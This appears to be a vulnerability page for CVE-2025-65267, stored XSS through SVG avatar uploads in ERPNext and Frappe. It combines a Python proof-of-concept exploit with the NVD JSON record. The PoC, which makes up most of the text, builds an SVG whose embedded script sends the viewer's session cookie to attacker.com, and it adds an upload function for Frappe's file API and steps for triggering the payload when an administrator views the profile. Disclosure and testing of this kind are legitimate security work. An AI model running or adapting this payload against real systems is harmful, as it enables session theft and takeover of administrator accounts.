CVE-2025-65267

# CVE-2025-65267 PoC - Malicious SVG Avatar with XSS Payload # This PoC demonstrates how to create a malicious SVG file that can be uploaded as an avatar import base64 import requests # Malicious SVG payload with embedded JavaScript # When displayed, this will execute JavaScript in the victim's browser svg_payload = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200"> <script type="text/javascript"> // Steal session cookies and send to attacker server fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)) .then(response => response.text()) .then(data => console.log('Cookie stolen')); // Alternative: Exfiltrate data via SVG onload // <image href="x" onerror="fetch('https://attacker.com/log?data='+document.cookie)"/> </script> <circle cx="100" cy="100" r="80" fill="#4CAF50"/> <text x="50%" y="50%" text-anchor="middle" fill="white" font-size="20">Avatar</text> </svg>''' # Save the malicious SVG file with open('malicious_avatar.svg', 'w') as f: f.write(svg_payload) print('[+] Malicious SVG file created: malicious_avatar.svg') print('[+] Upload this file as your profile avatar') print('[+] When admin views your profile, the XSS payload will execute') # Simulated upload request (adjust URL and auth token accordingly) def upload_avatar(base_url, auth_token, svg_file_path): upload_url = f"{base_url}/api/method/frappe.client.upload_file" headers = { 'Authorization': f'Bearer {auth_token}', 'Content-Type': 'multipart/form-data' } with open(svg_file_path, 'rb') as f: files = {'file': ('malicious_avatar.svg', f, 'image/svg+xml')} data = {'doctype': 'User', 'docname': 'attacker_user', 'fieldname': 'user_image'} response = requests.post(upload_url, headers=headers, files=files, data=data) return response.json() print('\n[!] Note: This PoC is for educational and security testing purposes only')

{"cve": {"id": "CVE-2025-65267", "sourceIdentifier": "[email protected]", "published": "2025-12-03T15:15:55.103", "lastModified": "2025-12-05T18:35:19.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege escalation, or full compromise of the affected ERPNext instance."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:15.83.2:*:*:*:*:*:*:*", "matchCriteriaId": "E8938912-6E20-4913-A21C-321B5C9D9EE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:15.86.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5DC3F26-8D6D-4530-857A-A7D72CE5A711"}]}]}], "references": [{"url": "https://github.com/PhDg1410/CVE/tree/main/CVE-2025-65267", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/frappe/erpnext", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/frappe/frappe", "source": "[email protected]", "tags": ["Product"]}]}}